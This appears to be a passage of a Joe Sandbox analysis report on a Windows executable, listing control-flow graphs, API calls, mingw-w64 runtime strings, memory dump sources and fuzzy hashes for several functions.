                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CA00216D4EE0695E2112B009F02571512CDB0A280F0420B0C01C96062CD2CD2426214

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 571 7ff69af16790-7ff69af167ac 572 7ff69af167c8-7ff69af167cf 571->572 573 7ff69af167ae-7ff69af167b5 571->573 575 7ff69af16840-7ff69af16846 572->575 576 7ff69af167d1-7ff69af167f9 GetLastError TlsGetValue SetLastError 572->576 574 7ff69af167b7-7ff69af167c3 573->574 579 7ff69af1695a-7ff69af16961 575->579 580 7ff69af1684c-7ff69af16856 575->580 577 7ff69af167ff-7ff69af16805 576->577 578 7ff69af168b0-7ff69af168ca call 7ff69af1b970 576->578 582 7ff69af168f8-7ff69af1691f call 7ff69af1b9c8 577->582 583 7ff69af1680b-7ff69af16817 577->583 596 7ff69af168d0 578->596 597 7ff69af169e3-7ff69af169f3 abort 578->597 579->576 586 7ff69af16967-7ff69af1697d 579->586 584 7ff69af16988-7ff69af16990 580->584 585 7ff69af1685c-7ff69af16864 580->585 582->597 608 7ff69af16925-7ff69af1693f memset 582->608 583->574 590 7ff69af16819-7ff69af16826 call 7ff69af16690 583->590 587 7ff69af16941-7ff69af16946 call 7ff69af16730 584->587 588 7ff69af16992-7ff69af169aa 584->588 592 7ff69af1686a-7ff69af16871 585->592 593 7ff69af169bc-7ff69af169d0 WaitForSingleObject 585->593 595 7ff69af16950-7ff69af16954 587->595 594 7ff69af169ac 588->594 588->595 590->574 592->586 602 7ff69af16877-7ff69af1687b 592->602 593->592 598 7ff69af169d6-7ff69af169de 593->598 603 7ff69af169b0-7ff69af169b8 Sleep 594->603 595->579 595->585 604 7ff69af168d3-7ff69af168e4 TlsSetValue 596->604 605 7ff69af16a00-7ff69af16a04 597->605 606 7ff69af169f5-7ff69af169f8 597->606 598->592 602->576 610 7ff69af16881-7ff69af16889 602->610 603->603 611 7ff69af169ba 603->611 604->583 612 7ff69af168ea-7ff69af168ed GetLastError 604->612 613 7ff69af16a06 605->613 614 7ff69af16a0a-7ff69af16a0d 605->614 606->605 608->604 610->576 615 7ff69af1688f-7ff69af168a4 ReleaseSemaphore 610->615 611->595 612->583 613->614 616 7ff69af16a0f-7ff69af16a12 614->616 617 7ff69af16a14 614->617 615->576 616->617 618 7ff69af16a18-7ff69af16a1c 616->618
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$Value
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1883355122-0
                                                                                                                                                                                                                                      • Opcode ID: 39baff2aec4dda407f8286b9c3e69d1a36ebd38e4dbff742ba3352efce0905ce
                                                                                                                                                                                                                                      • Instruction ID: 980b02ab19379bb4873c0b9454dd25eca8569f31f222276cd34a062e8590379c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39baff2aec4dda407f8286b9c3e69d1a36ebd38e4dbff742ba3352efce0905ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F614E71A09A0686EAB59F25AA0467933E1FF48B94F9881F5CD0DC77A0DF3DE942D340

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 662 7ff69af15430-7ff69af154bc call 7ff69af1b530 call 7ff69af1b9a0 call 7ff69af1b530 call 7ff69af1b9f0 call 7ff69af1b968 674 7ff69af15630-7ff69af15632 662->674 675 7ff69af154c2-7ff69af154cf 662->675 676 7ff69af154d0-7ff69af154d6 675->676 677 7ff69af154d8-7ff69af154e6 676->677 678 7ff69af154ec-7ff69af154f5 676->678 677->678 679 7ff69af15575-7ff69af15578 677->679 678->676 680 7ff69af154f7-7ff69af15505 call 7ff69af16340 678->680 682 7ff69af1557a-7ff69af1557d 679->682 683 7ff69af155a1-7ff69af155b3 679->683 690 7ff69af1550b-7ff69af15554 call 7ff69af16480 VirtualQuery 680->690 691 7ff69af15682-7ff69af156c0 call 7ff69af15430 680->691 687 7ff69af15640-7ff69af1564f 682->687 688 7ff69af15583-7ff69af15585 682->688 684 7ff69af15596-7ff69af155a0 683->684 685 7ff69af155b5-7ff69af155b8 683->685 689 7ff69af155ba-7ff69af155ca 685->689 687->684 688->684 692 7ff69af15587-7ff69af15590 688->692 689->689 695 7ff69af155cc-7ff69af155d6 689->695 700 7ff69af1555a-7ff69af15564 690->700 701 7ff69af15665-7ff69af15678 690->701 702 7ff69af156c2-7ff69af156d2 691->702 703 7ff69af156d3-7ff69af1572a call 7ff69af163c0 call 7ff69af16600 691->703 692->684 693 7ff69af15654-7ff69af15660 692->693 693->684 704 7ff69af15566-7ff69af1556c 700->704 705 7ff69af1556e 700->705 701->691 706 7ff69af1567d call 7ff69af15430 701->706 703->702 714 7ff69af1572c-7ff69af15732 703->714 704->705 708 7ff69af155e0-7ff69af15616 VirtualProtect 704->708 705->679 706->691 708->705 709 7ff69af1561c-7ff69af15629 GetLastError 708->709 709->674 711 7ff69af1562b call 7ff69af15430 709->711 711->674 715 7ff69af15738-7ff69af1573a 714->715 716 7ff69af15873-7ff69af15875 714->716 717 7ff69af15740 715->717 718 7ff69af15982-7ff69af15985 715->718 716->718 719 7ff69af1587b-7ff69af15883 716->719 720 7ff69af15743-7ff69af15745 717->720 718->702 722 7ff69af1598b-7ff69af159a6 718->722 719->720 721 7ff69af15889-7ff69af1588c 719->721 720->718 723 7ff69af1574b-7ff69af15751 720->723 728 7ff69af15895-7ff69af15898 721->728 724 7ff69af159b0-7ff69af159d3 call 7ff69af154a0 722->724 726 7ff69af15757-7ff69af15769 723->726 727 7ff69af15a02-7ff69af15a1e call 7ff69af15430 723->727 735 7ff69af159d5 724->735 730 7ff69af157bb-7ff69af157d5 726->730 731 7ff69af1576b 726->731 746 7ff69af15a4c-7ff69af15a50 727->746 747 7ff69af15a20-7ff69af15a4b 727->747 733 7ff69af159da-7ff69af159e9 call 7ff69af15430 728->733 734 7ff69af1589e-7ff69af158c3 728->734 737 7ff69af157db 730->737 738 7ff69af15940-7ff69af15966 730->738 731->702 743 7ff69af159ee-7ff69af159fd call 7ff69af15430 733->743 740 7ff69af158e0-7ff69af158f0 734->740 741 7ff69af158c5-7ff69af158d6 call 7ff69af154a0 734->741 735->733 737->728 745 7ff69af157e1-7ff69af157e4 737->745 738->740 744 7ff69af1596c-7ff69af1597d call 7ff69af154a0 738->744 742 7ff69af158f6-7ff69af15904 740->742 740->743 755 7ff69af157b2-7ff69af157b9 741->755 742->743 749 7ff69af1590a-7ff69af1590d 742->749 743->727 752 7ff69af157e6-7ff69af157e9 745->752 753 7ff69af15770-7ff69af1579b 745->753 747->746 749->744 756 7ff69af1590f 749->756 752->733 759 7ff69af157ef-7ff69af15803 752->759 753->740 757 7ff69af157a1-7ff69af157ad call 7ff69af154a0 753->757 755->730 764 7ff69af15823-7ff69af1582b 755->764 761 7ff69af15930-7ff69af15933 756->761 762 7ff69af15911-7ff69af15914 756->762 757->755 759->740 765 7ff69af15809-7ff69af15821 call 7ff69af154a0 759->765 761->755 768 7ff69af15939 761->768 762->757 767 7ff69af1591a-7ff69af1591d 762->767 764->702 766 7ff69af15831-7ff69af1583e 764->766 765->730 765->764 771 7ff69af15840-7ff69af15850 766->771 767->755 772 7ff69af15923 767->772 768->741 773 7ff69af1585f-7ff69af1586c 771->773 774 7ff69af15852-7ff69af1585d VirtualProtect 771->774 772->765 773->771 775 7ff69af1586e 773->775 774->773 775->702
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryVirtual
                                                                                                                                                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                                      • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                                      • Opcode ID: d59ba3dbec2e58c2c275aa6aaa2c030797e1cca854e4e1fde868210a952c4168
                                                                                                                                                                                                                                      • Instruction ID: 8283d65ddd2e71b0fb4788087729ba30581a0dd61b1e3a5a6bc3ec46388b3393
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d59ba3dbec2e58c2c275aa6aaa2c030797e1cca854e4e1fde868210a952c4168
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC61D2B2B1965686EB308B21EA442B977E1FB58B98F8441B5DE4C873A4EF3CE545C300

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fwprintf
                                                                                                                                                                                                                                      • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                                                                                                      • API String ID: 968622242-2115465065
                                                                                                                                                                                                                                      • Opcode ID: a2bac7666f7e135b15527277f3ebcc33ec3caf55eee56255511e73bfb8e46391
                                                                                                                                                                                                                                      • Instruction ID: fa4c48c54050bf0a84db448663f3d6d84067942396775b5ca7a5ff7c2ced67ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2bac7666f7e135b15527277f3ebcc33ec3caf55eee56255511e73bfb8e46391
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5541CFE3B08A4285E7B08A2598843B973D1EB94BA4F5881F5DE4CCB7C5DE3CE5428B00

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$CriticalDeleteSectionfree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2588641659-0
                                                                                                                                                                                                                                      • Opcode ID: 49f64f6c62e17442bbbcb2cb5bf0c4d4c676a0f4463eaa64af3b7663c536e7a7
                                                                                                                                                                                                                                      • Instruction ID: 7a84f0b7d843a502d7093cf51ccd83c351469ccd6fe0e37e1519325d50e5a8fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49f64f6c62e17442bbbcb2cb5bf0c4d4c676a0f4463eaa64af3b7663c536e7a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F31A1A4E1CA0B96FA309B20EB9463977A1EF58794F4800F5D40EC72B5DE3CEA84D744

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$_assertcalloc
                                                                                                                                                                                                                                      • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                                                                                                                                                      • API String ID: 3698345500-799109717
                                                                                                                                                                                                                                      • Opcode ID: b9f03744ceb0dac37647cf4d5369f7f128c41602597cda0a6f9f4a1755017ffb
                                                                                                                                                                                                                                      • Instruction ID: 4e8205f93aa8a93329b9f8c666d185f1203282f116791a95b06d8bb443e38558
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9f03744ceb0dac37647cf4d5369f7f128c41602597cda0a6f9f4a1755017ffb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F014061B0964A86FA758B55FA446B562D0EF4C7D0F8840F4C91CC73A5EE2CAA91C700
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %*.*s$%-*.*s$%.*s
                                                                                                                                                                                                                                      • API String ID: 0-4054516066
                                                                                                                                                                                                                                      • Opcode ID: 04f4ecb227f800f90691c90f72b122762c4425d4828b384464b353a568150eb3
                                                                                                                                                                                                                                      • Instruction ID: da6d2125e78e3fa0ff4c194d7be3de0504a9f02dcd67c98972c2d359d642d1b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04f4ecb227f800f90691c90f72b122762c4425d4828b384464b353a568150eb3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6341A3F2A18A5685E7F09F25C500679B7D1EB40764F54C2F4EE0DCB284EE3DA501CB00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc$abortmemcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4174897659-0
                                                                                                                                                                                                                                      • Opcode ID: 79e8ea0033ef1d9cab58d50f6e3ce57b37834047a87369d50b3562e8180e8def
                                                                                                                                                                                                                                      • Instruction ID: 9638461bb48de107de08ee6999a6d3f98fa9993e7a85a2f2df0d3d13153c8fd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79e8ea0033ef1d9cab58d50f6e3ce57b37834047a87369d50b3562e8180e8def
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 810108A2F05A4484E9649B56E5409F976E1EF58FD4FC481B5DE1C57381EE3CE982C300
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavecalloc
                                                                                                                                                                                                                                      • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                                                                                                                                                      • API String ID: 876395260-799109717
                                                                                                                                                                                                                                      • Opcode ID: 25d7586f7b1ee07523810b07f0050bf2b3b62a312bfb78454b13e963260707ed
                                                                                                                                                                                                                                      • Instruction ID: 54387b80dc0af3bc43a31269a743807882a2cbe1e83bc5a3fc23cbd3de37476d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25d7586f7b1ee07523810b07f0050bf2b3b62a312bfb78454b13e963260707ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01F361A08A0A85FA719B55FB442B523D0EF4CB90FC440B1C91CC33B5EE2DEA86C704
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(00007FF69B29CC28,00007FF69B29C080,00007FF69B29CC20,00007FF8C6F6ADA0,?,?,?,00000001,00007FF69AF1124C), ref: 00007FF69AF1585D
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69AF154A0: VirtualQuery.KERNEL32 ref: 00007FF69AF1554B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 00007FF69AF15A02
                                                                                                                                                                                                                                      • Unknown pseudo relocation bit size %d., xrefs: 00007FF69AF159DA
                                                                                                                                                                                                                                      • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF69AF159F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual$ProtectQuery
                                                                                                                                                                                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                                                                                                      • API String ID: 1027372294-1286557213
                                                                                                                                                                                                                                      • Opcode ID: 292a409c12c2be412fd72ce858b4461e270ab671a445d16a1f74d55113fbf21c
                                                                                                                                                                                                                                      • Instruction ID: 474b68ca9b29b55116e18ea5c2cae1b86d03f6f35c6c64beeda2505516c65c6d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 292a409c12c2be412fd72ce858b4461e270ab671a445d16a1f74d55113fbf21c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1691CBA2F19A4A86FA308B21D6116B973E0FF49BA8F9442B5CD1D873D8DE3CE541C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
